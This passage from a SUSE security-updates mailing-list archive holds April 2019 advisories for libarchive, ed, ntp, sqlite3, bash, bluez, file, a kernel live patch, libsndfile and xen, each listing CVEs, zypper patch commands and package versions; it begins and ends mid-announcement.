Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64): tiff-debuginfo-3.8.2-141.169.31.1 tiff-debugsource-3.8.2-141.169.31.1 References: https://www.suse.com/security/cve/CVE-2016-5102.html https://www.suse.com/security/cve/CVE-2019-6128.html https://bugzilla.suse.com/1121626 https://bugzilla.suse.com/983268 From sle-security-updates at lists.suse.com Mon Apr 1 10:11:11 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 18:11:11 +0200 (CEST) Subject: SUSE-SU-2019:0831-1: moderate: Security update for libarchive Message-ID: <20190401161111.74266FF2D@maintenance.suse.de> SUSE Security Update: Security update for libarchive ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0831-1 Rating: moderate References: #1120653 #1120654 #1120656 #1120659 #1124341 #1124342 Cross-References: CVE-2018-1000877 CVE-2018-1000878 CVE-2018-1000879 CVE-2018-1000880 CVE-2019-1000019 CVE-2019-1000020 Affected Products: SUSE Linux Enterprise Module for Development Tools 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes 6 vulnerabilities is now available. Description: This update for libarchive fixes the following issues: Security issues fixed: - CVE-2018-1000877: Fixed a double free vulnerability in RAR decoder (bsc#1120653) - CVE-2018-1000878: Fixed a Use-After-Free vulnerability in RAR decoder (bsc#1120654) - CVE-2018-1000879: Fixed a NULL Pointer Dereference vulnerability in ACL parser (bsc#1120656) - CVE-2018-1000880: Fixed an Improper Input Validation vulnerability in WARC parser (bsc#1120659) - CVE-2019-1000019: Fixed an Out-Of-Bounds Read vulnerability in 7zip decompression (bsc#1124341) - CVE-2019-1000020: Fixed an Infinite Loop vulnerability in ISO9660 parser (bsc#1124342) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-831=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-831=1 Package List: - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64): bsdtar-3.3.2-3.8.4 bsdtar-debuginfo-3.3.2-3.8.4 libarchive-debugsource-3.3.2-3.8.4 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libarchive-debugsource-3.3.2-3.8.4 libarchive-devel-3.3.2-3.8.4 libarchive13-3.3.2-3.8.4 libarchive13-debuginfo-3.3.2-3.8.4 References: https://www.suse.com/security/cve/CVE-2018-1000877.html https://www.suse.com/security/cve/CVE-2018-1000878.html https://www.suse.com/security/cve/CVE-2018-1000879.html https://www.suse.com/security/cve/CVE-2018-1000880.html https://www.suse.com/security/cve/CVE-2019-1000019.html https://www.suse.com/security/cve/CVE-2019-1000020.html https://bugzilla.suse.com/1120653 https://bugzilla.suse.com/1120654 https://bugzilla.suse.com/1120656 https://bugzilla.suse.com/1120659 https://bugzilla.suse.com/1124341 https://bugzilla.suse.com/1124342 From sle-security-updates at lists.suse.com Mon Apr 1 10:12:42 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 18:12:42 +0200 (CEST) Subject: SUSE-SU-2019:14005-1: Security update for ed Message-ID: <20190401161242.01507FF2D@maintenance.suse.de> SUSE Security Update: Security update for ed ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14005-1 Rating: low References: #1019807 Cross-References: CVE-2017-5357 Affected Products: SUSE Linux Enterprise Server 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ed fixes the following security issues: - CVE-2017-5357: An invalid free in the regular expression handling of the "ed" command processing could allow local users to crash ed. (bsc#1019807) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4: zypper in -t patch slessp4-ed-14005=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-ed-14005=1 Package List: - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64): ed-0.2-1001.30.3.4 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64): ed-debuginfo-0.2-1001.30.3.4 ed-debugsource-0.2-1001.30.3.4 References: https://www.suse.com/security/cve/CVE-2017-5357.html https://bugzilla.suse.com/1019807 From sle-security-updates at lists.suse.com Mon Apr 1 10:13:23 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 18:13:23 +0200 (CEST) Subject: SUSE-SU-2019:14004-1: moderate: Security update for ntp Message-ID: <20190401161323.6C4F8FF2D@maintenance.suse.de> SUSE Security Update: Security update for ntp ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14004-1 Rating: moderate References: #1001182 #1128525 Cross-References: CVE-2019-8936 Affected Products: SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for ntp fixes the following issues: Security issue fixed: - CVE-2019-8936: Fixed a null pointer exception which could allow an authenticated attcker to cause segmentation fault to ntpd (bsc#1128525). Other issues addressed: - Make sure that SLE12 version is higher than the one in SLE11 (bsc#1001182). - Fixed several bugs in the BANCOMM reclock driver. - Fixed ntp_loopfilter.c snprintf compilation warnings. - Fixed spurious initgroups() error message. - Fixed STA_NANO struct timex units. - Fixed GPS week rollover in libparse. - Fixed incorrect poll interval in packet. - Added a missing check for ENABLE_CMAC. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-ntp-14004=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-ntp-14004=1 Package List: - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): ntp-4.2.8p13-48.27.1 ntp-doc-4.2.8p13-48.27.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): ntp-debuginfo-4.2.8p13-48.27.1 ntp-debugsource-4.2.8p13-48.27.1 References: https://www.suse.com/security/cve/CVE-2019-8936.html https://bugzilla.suse.com/1001182 https://bugzilla.suse.com/1128525 From sle-security-updates at lists.suse.com Mon Apr 1 10:14:55 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 18:14:55 +0200 (CEST) Subject: SUSE-SU-2019:14003-1: moderate: Security update for sqlite3 Message-ID: <20190401161455.592F1FF2D@maintenance.suse.de> SUSE Security Update: Security update for sqlite3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14003-1 Rating: moderate References: #1119687 Cross-References: CVE-2018-20346 Affected Products: SUSE Studio Onsite 1.3 SUSE Linux Enterprise Software Development Kit 11-SP4 SUSE Linux Enterprise Server 11-SP4 SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for sqlite3 fixes the following issue: Security issue fixed: - CVE-2018-20346: Fixed a remote code execution vulnerability in FTS3 (Magellan) (bsc#1119687). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Studio Onsite 1.3: zypper in -t patch slestso13-sqlite3-14003=1 - SUSE Linux Enterprise Software Development Kit 11-SP4: zypper in -t patch sdksp4-sqlite3-14003=1 - SUSE Linux Enterprise Server 11-SP4: zypper in -t patch slessp4-sqlite3-14003=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-sqlite3-14003=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-sqlite3-14003=1 Package List: - SUSE Studio Onsite 1.3 (x86_64): sqlite3-devel-3.7.6.3-1.4.7.3.1 - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64): sqlite3-devel-3.7.6.3-1.4.7.3.1 - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64): libsqlite3-0-3.7.6.3-1.4.7.3.1 sqlite3-3.7.6.3-1.4.7.3.1 - SUSE Linux Enterprise Server 11-SP4 (ppc64 s390x x86_64): libsqlite3-0-32bit-3.7.6.3-1.4.7.3.1 - SUSE Linux Enterprise Server 11-SP4 (ia64): libsqlite3-0-x86-3.7.6.3-1.4.7.3.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): libsqlite3-0-3.7.6.3-1.4.7.3.1 sqlite3-3.7.6.3-1.4.7.3.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64): sqlite3-debuginfo-3.7.6.3-1.4.7.3.1 References: https://www.suse.com/security/cve/CVE-2018-20346.html https://bugzilla.suse.com/1119687 From sle-security-updates at lists.suse.com Tue Apr 2 07:10:17 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 2 Apr 2019 15:10:17 +0200 (CEST) Subject: SUSE-SU-2019:0838-1: important: Security update for bash Message-ID: <20190402131017.1D666F7BB@maintenance.suse.de> SUSE Security Update: Security update for bash ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0838-1 Rating: important References: #1130324 Cross-References: CVE-2019-9924 Affected Products: SUSE Linux Enterprise Workstation Extension 12-SP4 SUSE Linux Enterprise Workstation Extension 12-SP3 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE CaaS Platform ALL SUSE CaaS Platform 3.0 OpenStack Cloud Magnum Orchestration 7 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for bash fixes the following issues: Security issue fixed: - CVE-2019-9924: Fixed a vulnerability in which shell did not prevent user BASH_CMDS allowing the user to execute any command with the permissions of the shell (bsc#1130324). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 12-SP4: zypper in -t patch SUSE-SLE-WE-12-SP4-2019-838=1 - SUSE Linux Enterprise Workstation Extension 12-SP3: zypper in -t patch SUSE-SLE-WE-12-SP3-2019-838=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-838=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-838=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-838=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-838=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-838=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-838=1 - SUSE CaaS Platform ALL: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - SUSE CaaS Platform 3.0: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - OpenStack Cloud Magnum Orchestration 7: zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-838=1 Package List: - SUSE Linux Enterprise Workstation Extension 12-SP4 (noarch): bash-lang-4.3-83.23.1 - SUSE Linux Enterprise Workstation Extension 12-SP3 (noarch): bash-lang-4.3-83.23.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 bash-devel-4.3-83.23.1 readline-devel-6.3-83.23.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 bash-devel-4.3-83.23.1 readline-devel-6.3-83.23.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): bash-4.3-83.23.1 bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 libreadline6-6.3-83.23.1 libreadline6-debuginfo-6.3-83.23.1 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libreadline6-32bit-6.3-83.23.1 libreadline6-debuginfo-32bit-6.3-83.23.1 - SUSE Linux Enterprise Server 12-SP4 (noarch): bash-doc-4.3-83.23.1 readline-doc-6.3-83.23.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): bash-4.3-83.23.1 bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 libreadline6-6.3-83.23.1 libreadline6-debuginfo-6.3-83.23.1 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libreadline6-32bit-6.3-83.23.1 libreadline6-debuginfo-32bit-6.3-83.23.1 - SUSE Linux Enterprise Server 12-SP3 (noarch): bash-doc-4.3-83.23.1 readline-doc-6.3-83.23.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): bash-4.3-83.23.1 bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 libreadline6-32bit-6.3-83.23.1 libreadline6-6.3-83.23.1 libreadline6-debuginfo-32bit-6.3-83.23.1 libreadline6-debuginfo-6.3-83.23.1 - SUSE Linux Enterprise Desktop 12-SP4 (noarch): bash-doc-4.3-83.23.1 bash-lang-4.3-83.23.1 readline-doc-6.3-83.23.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): bash-4.3-83.23.1 bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 libreadline6-32bit-6.3-83.23.1 libreadline6-6.3-83.23.1 libreadline6-debuginfo-32bit-6.3-83.23.1 libreadline6-debuginfo-6.3-83.23.1 - SUSE Linux Enterprise Desktop 12-SP3 (noarch): bash-doc-4.3-83.23.1 bash-lang-4.3-83.23.1 readline-doc-6.3-83.23.1 - SUSE CaaS Platform ALL (x86_64): bash-4.3-83.23.1 bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 libreadline6-6.3-83.23.1 libreadline6-debuginfo-6.3-83.23.1 - SUSE CaaS Platform 3.0 (x86_64): bash-4.3-83.23.1 bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 libreadline6-6.3-83.23.1 libreadline6-debuginfo-6.3-83.23.1 - OpenStack Cloud Magnum Orchestration 7 (x86_64): bash-4.3-83.23.1 bash-debuginfo-4.3-83.23.1 bash-debugsource-4.3-83.23.1 libreadline6-6.3-83.23.1 libreadline6-debuginfo-6.3-83.23.1 References: https://www.suse.com/security/cve/CVE-2019-9924.html https://bugzilla.suse.com/1130324 From sle-security-updates at lists.suse.com Tue Apr 2 10:17:03 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 2 Apr 2019 18:17:03 +0200 (CEST) Subject: SUSE-SU-2019:0841-1: moderate: Security update for bluez Message-ID: <20190402161703.34510F7BB@maintenance.suse.de> SUSE Security Update: Security update for bluez ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0841-1 Rating: moderate References: #1015173 Cross-References: CVE-2016-9918 Affected Products: SUSE Linux Enterprise Workstation Extension 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for bluez fixes the following issues: Security issue fixed: - CVE-2016-9918: Fixed a out-of-bound read in the packet_hexdump function (bsc#1015173) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 15: zypper in -t patch SUSE-SLE-Product-WE-15-2019-841=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-841=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-841=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-841=1 Package List: - SUSE Linux Enterprise Workstation Extension 15 (x86_64): bluez-cups-5.48-5.13.10 bluez-cups-debuginfo-5.48-5.13.10 bluez-debuginfo-5.48-5.13.10 bluez-debugsource-5.48-5.13.10 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): bluez-debuginfo-5.48-5.13.10 bluez-debugsource-5.48-5.13.10 bluez-test-5.48-5.13.10 bluez-test-debuginfo-5.48-5.13.10 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): bluez-auto-enable-devices-5.48-5.13.10 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): bluez-5.48-5.13.10 bluez-debuginfo-5.48-5.13.10 bluez-debugsource-5.48-5.13.10 bluez-devel-5.48-5.13.10 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): bluez-debuginfo-5.48-5.13.10 bluez-debugsource-5.48-5.13.10 libbluetooth3-5.48-5.13.10 libbluetooth3-debuginfo-5.48-5.13.10 References: https://www.suse.com/security/cve/CVE-2016-9918.html https://bugzilla.suse.com/1015173 From sle-security-updates at lists.suse.com Tue Apr 2 10:19:43 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 2 Apr 2019 18:19:43 +0200 (CEST) Subject: SUSE-SU-2019:0839-1: moderate: Security update for file Message-ID: <20190402161943.AA87BF7BB@maintenance.suse.de> SUSE Security Update: Security update for file ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0839-1 Rating: moderate References: #1096974 #1096984 #1126117 #1126118 #1126119 Cross-References: CVE-2018-10360 CVE-2019-8905 CVE-2019-8906 CVE-2019-8907 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE CaaS Platform ALL SUSE CaaS Platform 3.0 OpenStack Cloud Magnum Orchestration 7 ______________________________________________________________________________ An update that solves four vulnerabilities and has one errata is now available. Description: This update for file fixes the following issues: The following security vulnerabilities were addressed: - Fixed an out-of-bounds read in the function do_core_note in readelf.c, which allowed remote attackers to cause a denial of service (application crash) via a crafted ELF file (bsc#1096974 CVE-2018-10360). - CVE-2019-8905: Fixed a stack-based buffer over-read in do_core_note in readelf.c (bsc#1126118) - CVE-2019-8906: Fixed an out-of-bounds read in do_core_note in readelf. c (bsc#1126119) - CVE-2019-8907: Fixed a stack corruption in do_core_note in readelf.c (bsc#1126117) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-839=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-839=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-839=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-839=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-839=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-839=1 - SUSE CaaS Platform ALL: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - SUSE CaaS Platform 3.0: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - OpenStack Cloud Magnum Orchestration 7: zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-839=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-devel-5.22-10.12.2 python-magic-5.22-10.12.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-devel-5.22-10.12.2 python-magic-5.22-10.12.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): file-5.22-10.12.2 file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-magic-5.22-10.12.2 libmagic1-5.22-10.12.2 libmagic1-debuginfo-5.22-10.12.2 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libmagic1-32bit-5.22-10.12.2 libmagic1-debuginfo-32bit-5.22-10.12.2 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): file-5.22-10.12.2 file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-magic-5.22-10.12.2 libmagic1-5.22-10.12.2 libmagic1-debuginfo-5.22-10.12.2 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libmagic1-32bit-5.22-10.12.2 libmagic1-debuginfo-32bit-5.22-10.12.2 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): file-5.22-10.12.2 file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-magic-5.22-10.12.2 libmagic1-32bit-5.22-10.12.2 libmagic1-5.22-10.12.2 libmagic1-debuginfo-32bit-5.22-10.12.2 libmagic1-debuginfo-5.22-10.12.2 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): file-5.22-10.12.2 file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-magic-5.22-10.12.2 libmagic1-32bit-5.22-10.12.2 libmagic1-5.22-10.12.2 libmagic1-debuginfo-32bit-5.22-10.12.2 libmagic1-debuginfo-5.22-10.12.2 - SUSE CaaS Platform ALL (x86_64): file-5.22-10.12.2 file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-magic-5.22-10.12.2 libmagic1-5.22-10.12.2 libmagic1-debuginfo-5.22-10.12.2 - SUSE CaaS Platform 3.0 (x86_64): file-5.22-10.12.2 file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-magic-5.22-10.12.2 libmagic1-5.22-10.12.2 libmagic1-debuginfo-5.22-10.12.2 - OpenStack Cloud Magnum Orchestration 7 (x86_64): file-5.22-10.12.2 file-debuginfo-5.22-10.12.2 file-debugsource-5.22-10.12.2 file-magic-5.22-10.12.2 libmagic1-5.22-10.12.2 libmagic1-debuginfo-5.22-10.12.2 References: https://www.suse.com/security/cve/CVE-2018-10360.html https://www.suse.com/security/cve/CVE-2019-8905.html https://www.suse.com/security/cve/CVE-2019-8906.html https://www.suse.com/security/cve/CVE-2019-8907.html https://bugzilla.suse.com/1096974 https://bugzilla.suse.com/1096984 https://bugzilla.suse.com/1126117 https://bugzilla.suse.com/1126118 https://bugzilla.suse.com/1126119 From sle-security-updates at lists.suse.com Tue Apr 2 10:24:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 2 Apr 2019 18:24:54 +0200 (CEST) Subject: SUSE-SU-2019:0845-1: important: Security update for the Linux Kernel (Live Patch 8 for SLE 15) Message-ID: <20190402162454.72C4EF7BB@maintenance.suse.de> SUSE Security Update: Security update for the Linux Kernel (Live Patch 8 for SLE 15) ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0845-1 Rating: important References: #1124729 #1124734 #1126284 #1128378 Cross-References: CVE-2019-6974 CVE-2019-7221 CVE-2019-8912 CVE-2019-9213 Affected Products: SUSE Linux Enterprise Module for Live Patching 15 ______________________________________________________________________________ An update that fixes four vulnerabilities is now available. Description: This update for the Linux Kernel 4.12.14-25_28 fixes several issues. The following security issues were fixed: - CVE-2019-9213: Expand_downwards in mm/mmap.c lacked a check for the mmap minimum address, which made it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task (bsc#1128378). - CVE-2019-8912: af_alg_release() in crypto/af_alg.c neglected to set a NULL value for a certain structure member, which could have led to a use-after-free in sockfs_setattr (bsc#1126284). - CVE-2019-7221: Fixed a user-after-free vulnerability in the KVM hypervisor related to the emulation of a preemption timer, allowing an guest user/process to crash the host kernel. (bsc#1124734). - CVE-2019-6974: kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandled reference counting because of a race condition, leading to a use-after-free (bsc#1124729). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Live Patching 15: zypper in -t patch SUSE-SLE-Module-Live-Patching-15-2019-844=1 SUSE-SLE-Module-Live-Patching-15-2019-845=1 Package List: - SUSE Linux Enterprise Module for Live Patching 15 (ppc64le x86_64): kernel-livepatch-4_12_14-25_25-default-3-2.1 kernel-livepatch-4_12_14-25_25-default-debuginfo-3-2.1 kernel-livepatch-4_12_14-25_28-default-2-2.1 kernel-livepatch-4_12_14-25_28-default-debuginfo-2-2.1 References: https://www.suse.com/security/cve/CVE-2019-6974.html https://www.suse.com/security/cve/CVE-2019-7221.html https://www.suse.com/security/cve/CVE-2019-8912.html https://www.suse.com/security/cve/CVE-2019-9213.html https://bugzilla.suse.com/1124729 https://bugzilla.suse.com/1124734 https://bugzilla.suse.com/1126284 https://bugzilla.suse.com/1128378 From sle-security-updates at lists.suse.com Tue Apr 2 10:30:00 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 2 Apr 2019 18:30:00 +0200 (CEST) Subject: SUSE-SU-2019:14008-1: moderate: Security update for libsndfile Message-ID: <20190402163000.CB236F7BB@maintenance.suse.de> SUSE Security Update: Security update for libsndfile ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14008-1 Rating: moderate References: #1071767 #1071777 #1117954 Cross-References: CVE-2017-17456 CVE-2017-17457 CVE-2018-19758 Affected Products: SUSE Linux Enterprise Software Development Kit 11-SP4 SUSE Linux Enterprise Server 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for libsndfile fixes the following issues: Security issues fixed: - CVE-2017-17456: Prevent segmentation fault in the function d2alaw_array() that may have lead to a remote DoS (bsc#1071777). - CVE-2017-17457: Prevent segmentation fault in the function d2ulaw_array() that may have lead to a remote DoS, a different vulnerability than CVE-2017-14246 (bsc#1071767). - CVE-2018-19758: Fixed a heap-based buffer over-read at wav.c in wav_write_header that could have been used for a denial of service attack (bsc#1117954). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 11-SP4: zypper in -t patch sdksp4-libsndfile-14008=1 - SUSE Linux Enterprise Server 11-SP4: zypper in -t patch slessp4-libsndfile-14008=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-libsndfile-14008=1 Package List: - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64): libsndfile-devel-1.0.20-2.19.12.1 - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64): libsndfile-1.0.20-2.19.12.1 - SUSE Linux Enterprise Server 11-SP4 (ppc64 s390x x86_64): libsndfile-32bit-1.0.20-2.19.12.1 - SUSE Linux Enterprise Server 11-SP4 (ia64): libsndfile-x86-1.0.20-2.19.12.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64): libsndfile-debuginfo-1.0.20-2.19.12.1 libsndfile-debugsource-1.0.20-2.19.12.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (ppc64 s390x x86_64): libsndfile-debuginfo-32bit-1.0.20-2.19.12.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (ia64): libsndfile-debuginfo-x86-1.0.20-2.19.12.1 References: https://www.suse.com/security/cve/CVE-2017-17456.html https://www.suse.com/security/cve/CVE-2017-17457.html https://www.suse.com/security/cve/CVE-2018-19758.html https://bugzilla.suse.com/1071767 https://bugzilla.suse.com/1071777 https://bugzilla.suse.com/1117954 From sle-security-updates at lists.suse.com Wed Apr 3 07:09:34 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 3 Apr 2019 15:09:34 +0200 (CEST) Subject: SUSE-SU-2019:14011-1: important: Security update for xen Message-ID: <20190403130934.2E564FEBC@maintenance.suse.de> SUSE Security Update: Security update for xen ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14011-1 Rating: important References: #1110924 #1111007 #1111011 #1111014 #1112188 #1114423 #1114988 #1115040 #1115045 #1115047 #1117756 #1123157 #1126140 #1126141 #1126192 #1126195 #1126196 #1129623 Cross-References: CVE-2018-10839 CVE-2018-17958 CVE-2018-17962 